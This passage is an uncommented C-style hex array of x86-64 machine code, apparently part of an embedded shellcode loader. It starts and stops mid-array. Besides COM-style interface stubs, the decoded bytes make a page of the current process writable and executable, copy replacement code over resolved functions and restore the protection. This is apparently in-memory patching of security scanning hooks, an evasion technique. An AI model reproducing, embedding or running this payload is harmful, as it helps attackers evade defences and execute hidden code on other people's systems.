1839 0x33, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x85, 0xc8,
1840 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00,
1841 0x00, 0x48, 0x89, 0x50, 0x60, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1842 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00, 0x00, 0x48, 0x89,
1843 0x50, 0x68, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1844 0x48, 0x8d, 0x15, 0x64, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
1845 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1846 0x62, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x85, 0xc8,
1847 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x60, 0x05, 0x00,
1848 0x00, 0x48, 0x89, 0x90, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1849 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5b, 0x05, 0x00,
1850 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1851 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1852 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1853 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1854 0x00, 0x48, 0x89, 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1855 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1856 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1857 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x46, 0x05, 0x00,
1858 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1859 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x49, 0x05, 0x00,
1860 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1861 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x44, 0x05, 0x00,
1862 0x00, 0x48, 0x89, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1863 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x47, 0x05, 0x00,
1864 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1865 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x42, 0x05, 0x00,
1866 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1867 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x05, 0x00,
1868 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1869 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1870 0x00, 0x48, 0x89, 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1871 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1872 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1873 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1874 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1875 0x01, 0x00, 0x00, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1876 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00,
1877 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
1878 0x05, 0xed, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x49, 0x89, 0xd0,
1879 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0xe8, 0x3e,
1880 0xb3, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x4c, 0x8b,
1881 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1882 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8d, 0x45, 0xa0, 0x48, 0x89, 0xc1, 0x41,
1883 0xff, 0xd0, 0x89, 0x85, 0xac, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x01,
1884 0x00, 0x00, 0x00, 0x75, 0x45, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1885 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x30, 0x48,
1886 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x10, 0x48, 0x8b,
1887 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x94, 0x08, 0x00, 0x00,
1888 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x49,
1889 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xac, 0x01,
1890 0x00, 0x00, 0x8b, 0x85, 0xac, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30,
1891 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1892 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1893 0x20, 0x48, 0x83, 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00,
1894 0x80, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1895 0x40, 0x28, 0x48, 0x8d, 0x88, 0x04, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45,
1896 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x51,
1897 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48,
1898 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x14, 0x08, 0x00, 0x00, 0x48, 0x8b,
1899 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1900 0x2c, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10,
1901 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x94, 0x08, 0x00, 0x00, 0x48,
1902 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2,
1903 0xe8, 0x07, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45,
1904 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00,
1905 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
1906 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d,
1907 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
1908 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45,
1909 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f,
1910 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4,
1911 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1912 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48,
1913 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00,
1914 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8,
1915 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1916 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1917 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
1918 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1919 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1920 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89,
1921 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75,
1922 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10,
1923 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48,
1924 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1925 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28,
1926 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20,
1927 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1928 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89,
1929 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
1930 0x00, 0x4c, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1931 0x10, 0x4c, 0x8b, 0x45, 0x38, 0x8b, 0x4d, 0x28, 0x48, 0x8b, 0x55, 0x20,
1932 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
1933 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1934 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1935 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
1936 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c,
1937 0x8b, 0x50, 0x58, 0x44, 0x0f, 0xb7, 0x45, 0xec, 0x48, 0x8b, 0x45, 0x10,
1938 0x48, 0x8b, 0x40, 0x10, 0x8b, 0x4d, 0x18, 0x48, 0x8b, 0x55, 0x50, 0x48,
1939 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54, 0x24,
1940 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8b,
1941 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x41, 0x89,
1942 0xc8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
1943 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55,
1944 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1945 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1946 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1947 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1948 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1949 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1950 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1951 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1952 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66, 0x89, 0x45, 0x18,
1953 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1954 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b,
1955 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50,
1956 0x70, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x41, 0xb9, 0x00,
1957 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0xfd, 0xff,
1958 0xff, 0xff, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0xb8, 0x00, 0x00, 0x00,
1959 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1960 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1961 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1962 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1963 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1964 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1965 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1966 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1967 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1968 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1969 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18,
1970 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1971 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c,
1972 0x89, 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1973 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1974 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1975 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
1976 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1977 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1978 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
1979 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1980 0x40, 0x28, 0x48, 0x8b, 0x50, 0x58, 0x8b, 0x45, 0x18, 0x89, 0xc1, 0xff,
1981 0xd2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
1982 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1983 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1984 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1985 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1986 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1987 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1988 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1989 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
1990 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00,
1991 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1992 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf,
1993 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1994 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1995 0x48, 0x8b, 0x45, 0x30, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1996 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1997 0x89, 0x55, 0x18, 0x8b, 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d,
1998 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d,
1999 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
2000 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x28, 0x03,
2001 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0xd8, 0xb1,
2002 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75,
2003 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xfe, 0x01, 0x00, 0x00, 0x48,
2004 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0x9c, 0x05, 0x00, 0x00, 0x48, 0x8b,
2005 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
2006 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9b, 0xae, 0xff, 0xff, 0x48,
2007 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00,
2008 0x00, 0x00, 0x00, 0xe9, 0xc5, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x05, 0x2e,
2009 0xff, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x02, 0xff, 0xff, 0xff, 0x48, 0x29,
2010 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79, 0x0a, 0xb8,
2011 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
2012 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89, 0x45, 0xd0,
2013 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8,
2014 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54,
2015 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48,
2016 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1f, 0x0e,
2017 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79, 0x0a, 0xb8,
2018 0x00, 0x00, 0x00, 0x00, 0xe9, 0x4c, 0x01, 0x00, 0x00, 0x8b, 0x55, 0xe4,
2019 0x48, 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x86, 0xfe,
2020 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x32, 0x06, 0x00, 0x00, 0x44, 0x8b,
2021 0x45, 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2022 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48,
2023 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
2024 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc0, 0x0d, 0x00,
2025 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xac, 0x05, 0x00, 0x00,
2026 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89,
2027 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9d, 0xad, 0xff,
2028 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a,
2029 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc7, 0x00, 0x00, 0x00, 0x48, 0x8d,
2030 0x05, 0x68, 0xfe, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x3c, 0xfe, 0xff, 0xff,
2031 0x48, 0x29, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79,
2032 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa2, 0x00, 0x00, 0x00, 0x48,
2033 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89,
2034 0x45, 0xd0, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2035 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48,
2036 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89,
2037 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
2038 0x21, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79,
2039 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x51, 0x8b, 0x55, 0xe4, 0x48,
2040 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfd, 0xff,
2041 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x37, 0x05, 0x00, 0x00, 0x44, 0x8b, 0x45,
2042 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55,
2043 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48, 0x89,
2044 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
2045 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc5, 0x0c, 0x00, 0x00,
2046 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55,
2047 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x01, 0x00, 0x00, 0x00,
2048 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89,
2049 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
2050 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x3c,
2051 0x03, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x7f,
2052 0xaf, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48,
2053 0x8d, 0x90, 0xbc, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9,
2054 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2055 0x4d, 0x10, 0xe8, 0x53, 0xac, 0xff, 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48,
2056 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2057 0xa7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8,
2058 0x48, 0xc7, 0x45, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xd0,
2059 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24,
2060 0x28, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
2061 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2062 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xfb, 0x0b, 0x00, 0x00, 0x89, 0x45,
2063 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2064 0xeb, 0x55, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xe0, 0x05, 0x00,
